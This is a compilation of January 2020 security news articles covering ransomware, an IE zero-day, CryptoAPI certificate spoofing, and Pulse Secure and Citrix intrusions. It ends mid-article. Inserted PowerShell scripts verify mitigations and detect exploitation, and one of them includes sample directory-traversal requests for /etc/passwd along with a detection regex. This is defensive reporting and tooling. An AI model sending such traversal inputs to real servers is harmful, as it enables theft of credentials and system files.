
Source : Bleepingcomputer or Project Zero


New Jersey Synagogue Suffers Sodinokibi Ransomware Attack
20.1.2020 
Bleepingcomputer  Ransomware

Temple Har Shalom in Warren, New Jersey, had its network breached by the actors behind the Sodinokibi ransomware, who encrypted numerous computers on the network.

In an email seen by BleepingComputer, Temple Har Shalom informed its congregation that it discovered the ransomware attack on January 9th, after staff had trouble connecting to the Internet.

After checking their servers, staff found the Temple's files encrypted and a ransom note left behind. Other computers on the network had been encrypted as well.

"The encryption affected all of our server-based files and electronic data. We have a mechanical back up for those files and data, but the back-up was encrypted as well. Certain computers were affected in full. Others were unaffected and remain functional," the email from Temple Har Shalom stated.

A source familiar with the matter told BleepingComputer that the Sodinokibi actors were demanding close to $500,000 for a decryptor for the network.

Temple Har Shalom says it will be contacting congregation members for the information needed to recreate the encrypted files, which indicates it has no intention of paying the ransom.

The temple says it feels violated by the attack but does not believe it was targeted as a Jewish organization.

"The attack is violative of us as a community, though we have no reason to believe that we were targeted because we are a Jewish organization."

As the Sodinokibi actors are known to steal files before encrypting them, they may have gained access to congregants' personal data.

The synagogue says this data may include a congregant's name, address, and email address, but it does not believe the attackers had access to financial information.

"Beyond names, addresses and e-mail addresses of congregants, because of the way we segregate our files, we do not believe that confidential personal membership information (such as financial information) was accessed," the email stated. "Nonetheless, as we note above, be particularly mindful of phishing scams."

Temple members should nonetheless be on the lookout for targeted phishing emails that use their personal information.

Sodinokibi has also begun publicly leaking the stolen data of victims that do not pay. It is not known how much data, if any, was stolen from the temple, or whether the actors intend to publish it for non-payment.

BleepingComputer has contacted both the ransomware actors and the temple but has not heard back at this time.


Microsoft Issues Mitigation for Actively Exploited IE Zero-Day
20.1.2020 
Bleepingcomputer  Exploit

Microsoft published a security advisory containing mitigation measures for an actively exploited zero-day remote code execution (RCE) vulnerability impacting Internet Explorer.

Redmond's advisory says the company is aware of "limited targeted attacks" exploiting this vulnerability.

"A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer," says the advisory.

"The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user."

While no patch exists yet, Microsoft says it is working on a fix that could ship as an out-of-band security update, as happened in September 2019 when a very similar Internet Explorer RCE zero-day was fixed.

Security Response (@msftsecresponse) on Twitter, Jan 17, 2020: "Security Advisory - Microsoft Guidance on Scripting Engine Memory Corruption - for more information please visit: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001"

Attackers who successfully exploit this flaw gain the same rights as the user logged on to the compromised Windows device.

If that user has administrative rights, the attacker can take full control of the system: install programs, view, change or delete data, or create new accounts with full user rights.

"In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website, for example, by sending an email," Microsoft adds.

The Internet Explorer versions and platforms affected by this zero-day, with impact and severity ratings, are listed below.

Product | Platform | Impact | Severity
Internet Explorer 10 | Windows Server 2012 | Remote Code Execution | Moderate
Internet Explorer 11 | Windows 10 Version 1803 for 32-bit Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1803 for x64-based Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1803 for ARM64-based Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1809 for 32-bit Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1809 for x64-based Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1809 for ARM64-based Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows Server 2019 | Remote Code Execution | Moderate
Internet Explorer 11 | Windows 10 Version 1909 for 32-bit Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1909 for x64-based Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1909 for ARM64-based Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1709 for 32-bit Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1709 for x64-based Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1709 for ARM64-based Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1903 for 32-bit Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1903 for x64-based Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1903 for ARM64-based Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 for 32-bit Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 for x64-based Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1607 for 32-bit Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 10 Version 1607 for x64-based Systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows Server 2016 | Remote Code Execution | Moderate
Internet Explorer 11 | Windows 7 for 32-bit Systems Service Pack 1 | Remote Code Execution | Critical
Internet Explorer 11 | Windows 7 for x64-based Systems Service Pack 1 | Remote Code Execution | Critical
Internet Explorer 11 | Windows 8.1 for 32-bit systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows 8.1 for x64-based systems | Remote Code Execution | Critical
Internet Explorer 11 | Windows RT 8.1 | Remote Code Execution | Critical
Internet Explorer 11 | Windows Server 2008 R2 for x64-based Systems Service Pack 1 | Remote Code Execution | Moderate
Internet Explorer 11 | Windows Server 2012 | Remote Code Execution | Moderate
Internet Explorer 11 | Windows Server 2012 R2 | Remote Code Execution | Moderate
Internet Explorer 9 | Windows Server 2008 for 32-bit Systems Service Pack 2 | Remote Code Execution | Moderate
Internet Explorer 9 | Windows Server 2008 for x64-based Systems Service Pack 2 | Remote Code Execution | Moderate
Redmond provides the following workaround, which denies all users access to jscript.dll. By default, Internet Explorer 9, 10 and 11 use Jscript9.dll, which is not affected; the vulnerable legacy engine is only loaded by sites that explicitly request it, and Microsoft warns that blocking it may reduce functionality for components or features that depend on jscript.dll.

For 32-bit systems, enter the following commands at an administrative command prompt:

takeown /f %windir%\system32\jscript.dll
cacls %windir%\system32\jscript.dll /E /P everyone:N

For 64-bit systems, enter the following commands at an administrative command prompt:

takeown /f %windir%\syswow64\jscript.dll
cacls %windir%\syswow64\jscript.dll /E /P everyone:N
takeown /f %windir%\system32\jscript.dll
cacls %windir%\system32\jscript.dll /E /P everyone:N

Undoing the workaround

For 32-bit systems, enter the following command at an administrative command prompt:

cacls %windir%\system32\jscript.dll /E /R everyone

For 64-bit systems, enter the following commands at an administrative command prompt:

cacls %windir%\system32\jscript.dll /E /R everyone
cacls %windir%\syswow64\jscript.dll /E /R everyone

Note that the undo steps remove the Deny entry but do not hand ownership of the file back to TrustedInstaller; ownership stays with the account that ran takeown.
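As an added check, not part of Microsoft's advisory, the following PowerShell function reports whether the Deny entry that the workaround adds is present on each copy of jscript.dll, so an administrator can confirm the state of a fleet before and after the eventual patch. The function name and output fields are my own choices; it assumes an elevated 64-bit PowerShell session on Windows.

```powershell
# Added example, not from Microsoft's advisory: report whether the ADV200001
# jscript.dll workaround (Deny Everyone) is currently applied on this machine.
# Run from an elevated 64-bit PowerShell session; a 32-bit host process would
# have System32 silently redirected to SysWOW64 by WoW64 file redirection.

function Test-JscriptMitigation {
    [CmdletBinding()]
    param()

    # 64-bit Windows carries two copies of the DLL; the advisory restricts both.
    $targets = @("$env:windir\System32\jscript.dll")
    if ([Environment]::Is64BitOperatingSystem) {
        $targets += "$env:windir\SysWOW64\jscript.dll"
    }

    foreach ($path in $targets) {
        if (-not (Test-Path -LiteralPath $path)) {
            [PSCustomObject]@{ Path = $path; Exists = $false; Mitigated = $false; Owner = $null }
            continue
        }
        try {
            $acl = Get-Acl -LiteralPath $path
        } catch {
            # A full Deny for Everyone also blocks READ_CONTROL for anyone who is
            # not the file's owner, so an administrator other than the one who
            # ran takeown can land here. Report it as unknown, not as unmitigated.
            [PSCustomObject]@{ Path = $path; Exists = $true; Mitigated = 'unknown (access denied)'; Owner = $null }
            continue
        }

        # "cacls ... /E /P everyone:N" writes a Deny ACE for the well-known
        # Everyone group (SID S-1-1-0). Compare on the SID so localized
        # group names do not matter.
        $denyEveryone = $acl.Access | Where-Object {
            $_.AccessControlType -eq 'Deny' -and
            $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value -eq 'S-1-1-0'
        }

        [PSCustomObject]@{
            Path      = $path
            Exists    = $true
            Mitigated = [bool]$denyEveryone
            Owner     = $acl.Owner
        }
    }
}

Test-JscriptMitigation | Format-Table -AutoSize
```

The Owner column is worth keeping in the report: a jscript.dll owned by a user account rather than TrustedInstaller is the footprint the takeown step leaves, and it remains after the Deny entry is removed.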


New US Bill Wants to Assign State Cybersecurity Coordinators
20.1.2020 
Bleepingcomputer  Cyber

Four U.S. Senators have introduced a bipartisan bill that would require the Department of Homeland Security (DHS) to appoint a cybersecurity coordinator in every state to orchestrate cyberattack response and remediation efforts and to improve coordination between federal, state, and local entities.

Under the Cybersecurity State Coordinator Act of 2020, introduced on January 16, 2020 by Senators Margaret Hassan (D-NH), John Cornyn (R-TX), Rob Portman (R-OH), and Gary Peters (D-MI), the coordinators would ensure that local, state, and federal entities collaborate and share resources when preventing and responding to cybersecurity threats.

"Cyberattacks can be devastating for communities across our country, from ransomware attacks that can block access to school or medical records to cyberattacks that can shut down electrical grids or banking services," the bill's sponsor Senator Hassan said.

"The bipartisan bill I introduced would take a big step forward in improving communication between the federal government, states, and localities, as well as strengthening cybersecurity preparedness in communities across the country."

Senator Hassan also said that, while officials were well prepared to respond to ransomware attacks such as those that hit New Hampshire's Strafford County and the Sunapee School District, the federal government must make sure local and state entities have the training and resources to mitigate and defend against future attacks.

Cybersecurity state coordinator responsibilities
Hassan's press release explains that the federally funded Cybersecurity State Coordinator program would be housed in DHS's Cybersecurity and Infrastructure Security Agency (CISA).

According to the bill's text, the CISA Director would appoint CISA employees to serve as Cybersecurity State Coordinators, with duties including:

• Improve coordination within federal entities and between federal and non-federal entities, including state and local governments and other organizations
• Support preparation, response, and remediation efforts relating to cybersecurity risks and incidents, including ransomware
• Facilitate the sharing of cyber threat information
• Raise awareness of financial, technical, and operational resources that the federal government offers to non-federal entities to help prevent cyber threats

Senator Portman added that "cybersecurity for state and local governments is just as important as federal cybersecurity, and frequently, they lack the resources, technical know-how, and situational awareness to secure their systems, or respond in the event of an attack.

This bipartisan bill, which creates a Cybersecurity State Coordinator position, would help bolster state and local governments’ cybersecurity by facilitating their relationship with the federal government to ensure they know what preventative resources are available to them as well as who to turn to if an attack occurs."

Senator Peters also said that, given the increasing sophistication of cyber threats, states need someone who can take charge during a cyberattack and coordinate with federal government experts.

"These coordinators would help states better understand relevant threats, access federal cybersecurity resources and respond to potential attacks," he added.

DHS cyber response teams to ransomware, cyberattacks
Senator Hassan introduced another bill on January 31, 2019, the DHS Cyber Hunt and Incident Response Teams Act, to authorize DHS cyber hunt and incident response teams after the increasing number of cyberattacks that targeted US entities during 2018.

That bill, signed into law by the President on December 20, 2019, lets the newly authorized teams provide technical support and advice to government and private sector organizations on how to harden their IT systems against such attacks.

Per the DHS Cyber Hunt and Incident Response Teams Act, the teams are responsible for:

• assistance to asset owners and operators in restoring services following a cyber incident;
• identification of cybersecurity risk and unauthorized cyber activity;
• mitigation strategies to prevent, deter, and protect against cybersecurity risks;
• recommendations to asset owners and operators for improving overall network and control systems security to lower cybersecurity risks, and other recommendations, as appropriate;

The Senator has previously worked on other bipartisan cybersecurity bills, including the Hack Department of Homeland Security (DHS) Act and the Public-Private Cybersecurity Cooperation Act, part of a package of bills signed into law on December 21, 2018.

The FBI's Internet Crime Complaint Center issued a public service announcement in October 2019 on the growing number of high-impact ransomware attacks against both public and private US organizations.


How Malware Gains Trust by Abusing the Windows CryptoAPI Flaw
20.1.2020 
Bleepingcomputer  Vulnerebility  Virus

The Windows CryptoAPI vulnerability CVE-2020-0601, disclosed by the NSA, can be abused by malware developers to sign their executables so that they appear to come from legitimate companies. That borrowed trust makes a user more willing to run them.

Most coverage of this vulnerability shows how it can be exploited to spoof the certificates used for TLS connections to web sites and mount man-in-the-middle (MITM) attacks.

For example, Kudelski Security showed how it used the vulnerability to create a fake certificate impersonating github.com. To protect users, Chrome added checks that block access to sites presenting such spoofed certificates.

Spoofing web site certificates
This vulnerability, though, can also be used to spoof code-signing certificates.

When a developer releases a program, they can digitally sign the executables to assure users that the program comes from a known source. If the user trusts the company, they are likely to trust its signed executables as well and be more willing to run them.

Antivirus software may also exempt programs from detection when they carry trusted, well-known digital signatures.

Using this CryptoAPI vulnerability, malware distributors can create code-signing certificates that spoof legitimate companies, so that their signed malware appears to come from a trusted company such as Microsoft.

It's about trust
When an executable that requires elevated (administrative) privileges is run in Windows, the operating system displays a User Account Control (UAC) prompt asking you to confirm that the permission should be granted.

If the executable is code-signed, the UAC prompt shows a blue banner, the product name of the executable, its icon, and the developer name taken from the code-signing certificate. The user can then use this information to decide whether to grant the program elevated privileges.

UAC Prompt for the Windows Registry Editor
When the same executable is unsigned, Windows shows a UAC prompt with a yellow banner that lists the publisher as 'Unknown' and again asks whether you want to grant elevated privileges.

UAC Prompt from an unsigned executable
As the two prompts above show, the one for the unsigned executable is designed to make the user warier about granting administrative privileges.

Because of this, malware distributors commonly create fake companies to purchase code-signing certificates, or steal certificates from other companies, and use them to sign their malware.

The problem for attackers is that once a certificate is reported as being used to sign malware, the issuing certificate authority revokes it so that it no longer works.

Using CVE-2020-0601 to spoof trusted publishers
Using CVE-2020-0601, malware distributors can easily create certificates that spoof legitimate companies such as Microsoft.

This lets them sign their executables so that they appear to carry the same code-signing certificate seen on Windows' own executables. Worse, because these certificates exploit a vulnerability rather than being issued by a CA, no certificate authority can revoke them, and unpatched Windows devices have no way to block them.

Signing an executable as a trusted publisher could also let malware slip past antivirus engines that whitelist the trusted certificate.

To illustrate this, BleepingComputer found an executable on VirusTotal signed with a certificate that exploits CVE-2020-0601 and spoofs the ones Microsoft uses to sign Windows executables.

On an unpatched system, Windows sees nothing wrong with the certificate when it is opened.

Certificates on an unpatched system
Even when the program is run, it shows a UAC prompt indicating it was signed by Microsoft.

UAC prompt on an unpatched system
On a patched system, though, Windows recognizes the spoofed certificate and displays the warning "A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider."

Certificates on a patched system
UAC prompts on a patched system also ignore the spoofed certificate and treat the application as untrusted.

UAC prompt on a patched system
It is not a question of whether malware will exploit this vulnerability, but when.

Researchers are already uploading executables signed with spoofed certificates to VirusTotal, and malware using the technique in the wild can be expected soon.

With easy-to-use proof-of-concepts available, this vulnerability lets attackers generate signed malware that looks trusted and may bypass antivirus software.

Better still, from the attacker's point of view, it lets them do so without the cost and hassle of acquiring a legitimate code-signing certificate that can easily be revoked.

"This is an immediate high-impact scenario for malware bypass. For the past year, malware deliveries have reused a signed malware to bypass AV systems relying on this check rather than their own. At its best, the criminals would leverage this vulnerability against unpatched Windows 10 as part of "free" malware signing bypassing static and/or trust-based detection," Head of SentinelLabs Vitali Kremez told BleepingComputer in a conversation about this vulnerability.

Windows Defender detects malicious certificates
The good news is that antivirus vendors, web browsers, and Microsoft have been hard at work adding detections for these spoofed certificates.

Windows Defender will now detect programs signed with certificates that exploit this vulnerability as Exploit:Win32/CVE-2020-0601.

Windows Defender detected CVE-2020-0601
Windows also uses the CveEventWrite function to log attempts to exploit CVE-2020-0601, and those entries show up in the Event Viewer.

Logging exploit attempts to Event Viewer
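As an added example, not Microsoft's or BleepingComputer's code, here is how a responder can check a patched Windows host for both artifacts the article describes: the Audit-CVE events written through CveEventWrite, and the Authenticode status of a suspect binary, which a patched CryptoAPI reports as not trusted. The function names and the placeholder sample path are my own assumptions.

```powershell
# Added example, not from the original article: two checks for CVE-2020-0601
# on a patched Windows host. Function names and $SamplePath are placeholders.

# 1. Audit-CVE events. The patched CryptoAPI calls CveEventWrite, which lands
#    in the Application log as Event ID 1 from provider Microsoft-Windows-Audit-CVE.
function Get-Cve20200601Events {
    param([int]$Days = 7)

    $filter = @{
        LogName      = 'Application'
        ProviderName = 'Microsoft-Windows-Audit-CVE'
        Id           = 1
        StartTime    = (Get-Date).AddDays(-$Days)
    }
    # Get-WinEvent throws when nothing matches the filter; treat that as empty.
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'CVE-2020-0601' } |
        Select-Object TimeCreated, Id,
            @{ n = 'Message'; e = { $_.Message -replace '\s+', ' ' } }
}

# 2. Authenticode status of a suspect binary. On a patched host a spoofed
#    chain is rejected and StatusMessage carries the "terminated in a root
#    certificate which is not trusted" text quoted above; on an unpatched
#    host the same file comes back Valid, which is exactly the result not to trust.
function Test-SuspectSignature {
    param([Parameter(Mandatory)][string]$Path)

    $sig = Get-AuthenticodeSignature -FilePath $Path
    [PSCustomObject]@{
        Path          = $Path
        Status        = $sig.Status
        StatusMessage = $sig.StatusMessage
        Subject       = $sig.SignerCertificate.Subject
        Issuer        = $sig.SignerCertificate.Issuer
        PublicKeyAlg  = $sig.SignerCertificate.PublicKey.Oid.FriendlyName
        Thumbprint    = $sig.SignerCertificate.Thumbprint
        Trusted       = ($sig.Status -eq 'Valid')
    }
}

Get-Cve20200601Events -Days 30 | Format-Table -AutoSize

$SamplePath = 'C:\Quarantine\suspect.exe'   # placeholder; point it at your sample
if (Test-Path -LiteralPath $SamplePath) {
    Test-SuspectSignature -Path $SamplePath | Format-List
}
```

CVE-2020-0601 is a flaw in the validation of ECC certificates, so an ECC signer (PublicKeyAlg reporting ECC) on a chain that claims to end in a well-known root deserves a closer look when the host is unpatched. The Audit-CVE query is also a reasonable thing to forward from endpoints to a SIEM, since the events fire on any spoofed chain the host encounters, not only on executables.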
Google Chrome added protections in Chrome 79.0.3945.130 that prevent you from reaching sites that present spoofed certificates.

Chrome with CVE-2020-0601 detection
Finally, antivirus engines from McAfee, Kaspersky, ZoneAlarm, and GData have added detections for certificates exploiting this vulnerability, and others will follow.

If so many security companies and software developers are taking this vulnerability seriously, so should you.

Install the patch as soon as possible to be protected.


FBI Says State Actors Hacked US Govt Network With Pulse VPN Flaw
20.1.2020 
Bleepingcomputer  BigBrothers

The FBI said in a flash security alert that nation-state actors have breached the networks of a US municipal government and a US financial entity by exploiting a critical vulnerability in Pulse Secure VPN servers.

The US Cybersecurity and Infrastructure Security Agency (CISA) had previously alerted organizations on January 10 to patch their Pulse Secure VPN servers against ongoing attacks exploiting the flaw tracked as CVE-2019-11510.

The bug lets unauthenticated remote attackers send specially crafted URIs to vulnerable servers and read sensitive files containing user credentials, which can later be used to take control of an organization's systems and more.

On unpatched systems, the vulnerability "allows people without valid usernames and passwords to remotely connect to the corporate network the device is supposed to protect, turn off multi-factor authentication controls, remotely view logs and cached passwords in plain text (including Active Directory account passwords)," security researcher Kevin Beaumont explained.

FBI Flash Alert AC-000112-TT

US entities breached in Pulse Secure VPN attacks
The FBI says unidentified threat actors have used CVE-2019-11510 "to exploit notable US entities" since August 2019.

In August 2019, attackers gained access to a US financial entity's research network by exploiting servers unpatched against CVE-2019-11510.

During the same month, a US municipal government network was also breached following an attack that exploited the same vulnerability.

Based on the sophistication of the Tactics, Techniques, and Procedures (TTPs) used in the two attacks, "the FBI believes unidentified nation-state actors are involved in both compromises; however, it remains unclear if these are isolated incidents."

US govt network hacked
The attack that targeted and compromised the US municipal government network took place in mid-August 2019 according to the FBI.

"In this case, the operators were able to enumerate and exfiltrate user accounts, host configuration information, and session identifiers that could allow them to gain further access to the internal network.

At this time, the FBI is continuing to gather indicators of compromise on the incident."

Attackers infiltrate US financial entity's research network
"The intruder(s) remotely exploited a Pulse Secure VPN appliance by using CVE-2019-11510," the flash alert says. "The vulnerability in Pulse Secure allowed directory traversal and access to a file where login credentials were written in plain text. In addition, the Pulse Secure appliance may have been vulnerable to a buffer overflow and command injection."

After breaching the network, the nation-state actors gained access to Active Directory and harvested and exfiltrated user credentials (usernames and passwords) for the VPN client.

Despite attempts to enumerate and access other network segments, the intruders were only able to get into the exploited segment, which was the only one on the network using single-factor authentication.

"The intruder(s) attempted to access several Outlook web mail accounts but were unsuccessful due to the accounts being on separate domains requiring different credentials not obtained by the intruder(s).

While the intruder(s) performed additional enumeration, there was no evidence that any data was compromised or exfiltrated, and the intruder(s) seemingly did not install any persistence capability or foothold in the network."

FBI PIN 20200109-001

Possible Iran connection and mitigation measures
While the FBI did not directly connect these attacks to Iranian-backed hackers, a Private Industry Notification (PIN) on Iranian cyber tactics and techniques, shared a day later, mentions "information indicating Iranian cyber actors have attempted to exploit Common Vulnerability and Exposures (CVEs) 2019-11510 [..]"

"The FBI assesses this targeting, which has occurred since late 2019, is broadly scoped and has affected numerous sectors in the United States and other countries.

The FBI has observed actors using information acquired from exploiting these vulnerabilities to further access targeted networks, and establish other footholds even after the victim patched the vulnerability."

The FBI advises municipalities to review the National Security Agency (NSA) cybersecurity advisory on mitigating VPN vulnerabilities.

It also recommends the following measures to defend against attacks targeting domains connected to municipal networks, including "local infrastructure managing emergency services, transportation, or elections:"

• Be alert to and immediately install patches released by the vendors, especially for web-facing appliances;
• Block or monitor the malicious IP addresses listed in the alert, as well as any other IP addresses conducting remote logins at odd hours;
• Reset credentials before reconnecting the upgraded devices to an external network;
• Revoke and create new VPN server keys and certificates;
• Use multifactor authentication as a measure of security beyond passwords, which allows you to differentiate a user from an attacker;
• Review your accounts to ensure adversaries did not create new accounts;
• Implement network segmentation where appropriate;
• Ensure that administrative web interfaces are not accessible from the internet.

Ongoing attacks targeting unpatched Pulse Secure VPN servers
According to an NSA advisory from October 2019, "Exploit code is freely available online via the Metasploit framework, as well as GitHub. Malicious cyber actors are actively using this exploit code."

While on August 25, 2019, security firm Bad Packets found 14,528 unpatched Pulse Secure servers, a scan from today yielded 3,328, with the U.S. leading the "leaderboard" with over 1,000 unpatched VPN servers.

Bad Packets Report (@bad_packets) on Twitter, Jan 17, 2020: "Week 21 CVE-2019-11510 Scan Results • Vulnerable Pulse Secure VPN servers detected: 3,328. Our latest vulnerability scan results are freely available for authorized government CERT, CSIRT, and ISAC teams. Submit request here: https://forms.gle/nkVd1xNkACobo2Zt6 #cybersecurity #threatintel"

The two US entities the FBI says were compromised are not the only examples of such successful attacks targeting CVE-2019-11510.

While not yet officially confirmed, a high-profile case could be that of the international foreign currency exchange Travelex, which was hit by Sodinokibi ransomware on December 31 after not patching its Pulse Secure VPN servers, with the attackers asking for a $3 million ransom.

Travelex was one of the companies that Bad Packets' Troy Mursch warned in September 2019 of having vulnerable servers. Travelex did not reply to his email at the time.

Scott Gordon (CISSP), Pulse Secure Chief Marketing Officer, told BleepingComputer that attackers are actively exploiting "unpatched VPN servers to propagate malware, REvil (Sodinokibi), by distributing and activating the Ransomware through interactive prompts of the VPN interface to the users attempting to access resources through unpatched, vulnerable Pulse VPN servers."


Hackers Are Securing Citrix Servers, Backdoor Them for Access
20.1.2020 
Bleepingcomputer  Hacking  Vulnerebility

An unknown threat actor is currently scanning for and securing vulnerable Citrix ADC servers against CVE-2019-19781 exploitation attempts, while also backdooring them for future access.

The actor deploys a payload that FireEye researchers, who discovered the campaign, dubbed NOTROBIN: an implant that cleans Citrix ADC appliances of malware strains known to target such devices and mitigates CVE-2019-19781 to block subsequent exploitation attempts.

NOTROBIN also plants a backdoor that gives access to the now-secured Citrix ADC server to anyone who knows a secret hardcoded passphrase, unique to each compromised device.

NOTROBIN was also observed adding cron entries to persist on compromised servers.

Further exploitation blocked on 'secured' devices
"FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign," the report says.

While monitoring one of the devices where NOTROBIN was dropped, the researchers saw more than a dozen attacks blocked over three days, with the attackers receiving 404 errors after their malicious templates containing commands were deleted in real time.

"The mitigation works by deleting staged exploit code found within NetScaler templates before it can be invoked," FireEye explains.

"However, when the actor provides the hardcoded key during subsequent exploitation, NOTROBIN does not remove the payload. This lets the actor regain access to the vulnerable device at a later time."

While this actor has not yet dropped any other malware on the Citrix servers it secured against future CVE-2019-19781 exploitation, FireEye's researchers are skeptical about its intentions, since on the whole the campaign looks like a staging operation hoarding Citrix appliances for as-yet-unknown purposes.

Citrix still working on a patch for vulnerable appliances
CVE-2019-19781 affects Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances, and lets unauthenticated attackers achieve arbitrary code execution via directory traversal.

Currently, over 25,000 Citrix endpoints are vulnerable to attacks targeting this flaw, with almost 1,000 found in the U.S. and thousands more in Germany, the United Kingdom, Switzerland, and Australia, as Bad Packets reported almost a week ago.

Scans for vulnerable Citrix appliances began on January 8, according to security experts, and proof-of-concept (PoC) exploits were made public two days later.

The PoC exploits let attackers take control of vulnerable Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) devices by spawning reverse shells and executing commands on the compromised servers.

Although Citrix disclosed the bug almost a month ago, a patch for CVE-2019-19781 is not yet available. Instead, the company provides mitigations and has published a timeline of expected release dates for firmware updates that address the issue, starting January 20, 2020.
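Both this Citrix flaw and the Pulse Secure CVE-2019-11510 flaw covered in the FBI story above are reached through directory-traversal requests, so a first triage pass over reverse-proxy or appliance access logs is to pull out such requests and sort them by whether the appliance actually served them. The following PowerShell function is an added example, not code from the FBI alert, FireEye or Citrix; the log lines are constructed for the example with invented paths and documentation IP addresses, not the real exploit URIs, and the function name and output fields are my own.

```powershell
# Added example, not from the original articles: find directory-traversal
# requests in web access logs and flag the ones the server answered with 2xx.
# Sample lines are constructed; paths are invented, not real IOCs.

function Find-TraversalRequests {
    param([Parameter(Mandatory)][string[]]$Lines)

    # Combined-log-format style: client, timestamp, request line, status code.
    $format = '^(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<uri>\S+) [^"]*" (?<status>\d{3})'

    foreach ($line in $Lines) {
        if ($line -notmatch $format) { continue }
        # Copy the captures now: the second -match below overwrites $Matches.
        $client = $Matches.ip
        $when   = $Matches.ts
        $method = $Matches.method
        $uri    = $Matches.uri
        $status = [int]$Matches.status

        # Decode twice so %2e%2e%2f and the double-encoded %252e%252e%252f both
        # normalise to ../ ; fold backslashes to forward slashes as well.
        $decoded = [System.Uri]::UnescapeDataString([System.Uri]::UnescapeDataString($uri))
        $decoded = $decoded -replace '\\', '/'

        # Require a whole ".." path segment, so dots inside a filename such as
        # app..js do not trip the check.
        if ($decoded -notmatch '(^|/)\.\.(/|$)') { continue }

        [PSCustomObject]@{
            Client  = $client
            Time    = $when
            Method  = $method
            Uri     = $uri
            Decoded = $decoded
            Status  = $status
            # 2xx means the appliance answered the traversal; those are the
            # requests to pull file and session context for first.
            Served  = ($status -ge 200 -and $status -lt 300)
        }
    }
}

# Constructed sample lines (RFC 5737 documentation addresses, invented paths).
$sample = @(
    '203.0.113.10 - - [12/Jan/2020:03:14:07 +0000] "GET /login/index.html HTTP/1.1" 200 5120'
    '203.0.113.10 - - [12/Jan/2020:03:14:09 +0000] "GET /portal/../cfg/app.conf HTTP/1.1" 200 871'
    '198.51.100.7 - - [12/Jan/2020:03:15:41 +0000] "GET /static/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 0'
    '198.51.100.7 - - [12/Jan/2020:03:15:44 +0000] "GET /static/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 1844'
    '192.0.2.55 - - [12/Jan/2020:03:16:02 +0000] "GET /assets/app..js HTTP/1.1" 200 2200'
)

Find-TraversalRequests -Lines $sample | Format-Table -AutoSize
```

Feed real logs in with something like Get-Content on the appliance's exported access log. The Served column is the one to act on: a traversal the appliance answered means the credential file or template the attacker wanted was probably returned, which is the point at which the FBI's list above (reset credentials, rotate VPN keys and certificates, review accounts) stops being advice and becomes the incident plan, and the client addresses are the ones to block or monitor.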

Fermin J. Serna
@fjserna
We just published further information around the Citrix ADC/Gateway vulnerability with fix release dates. If I can recommend something, apply the mitigation ASAP if you have the management IP exposed and not firewall protected. It stops the attack on known vulnerable scenarios. https://twitter.com/CitrixNetwork/status/1216153467926073349 …

Citrix Networking
@CitrixNetwork
Blog post from @Citrix CISO @fjserna about updates to the Citrix ADC, Citrix Gateway #CVE201919781 vulnerability - https://bit.ly/36LRITI

1:43 AM - Jan 12, 2020
Citrix also noted in an updated advisory yesterday that the mitigations are ineffective for Citrix ADC Release 12.1 builds before 51.16/51.19 and 50.31 because a "bug exists that affects responder and rewrite policies bound to VPN virtual servers causing them not to process the packets that matched policy rules."

For these cases, the company recommends updating to an unaffected build and then applying the mitigation steps to fully protect devices.

Four days ago, the Cybersecurity and Infrastructure Security Agency (CISA) also released a public domain tool that allows security staff to test if their organizations' servers are vulnerable.

The Dutch National Cybersecurity Centre (NCSC) issued a warning yesterday advising companies to shut down their Citrix ADC and Gateway servers until a reliable solution for protecting all Citrix appliance versions against CVE-2019-19781 is available.

The full timeline of expected release dates for firmware updates is available below:

Citrix ADC and Citrix Gateway
Version   Refresh Build   Expected Release Date
10.5      10.5.70.x       31st January 2020
11.1      11.1.63.x       20th January 2020
12.0      12.0.63.x       20th January 2020
12.1      12.1.55.x       27th January 2020
13.0      13.0.47.x       27th January 2020

Citrix SD-WAN WANOP
Release   NetScaler Release   Expected Release Date
10.2.6    11.1.63.x           27th January 2020
11.0.3    11.1.63.x           27th January 2020


Fraudsters Set Up Site Selling Temporary Social Security Numbers
20.1.2020 
Bleepingcomputer  CyberCrime

Some fraudsters have set up a scam site claiming to be for a data protection fund created by the U.S. Federal Trade Commission (FTC) to offer financial compensation to users whose personal data appeared in information leaks.

This is a reinterpretation of the classic advance-fee scam, where the victim makes a small payment, lured by the promise of getting a much larger sum in return.

Despite posing as a site associated with the FTC, this money-making scheme accepts victims from any country and offers to sell "temporary social security numbers (SSNs)" to those that don't have one.

Bait: cash for data leak victims
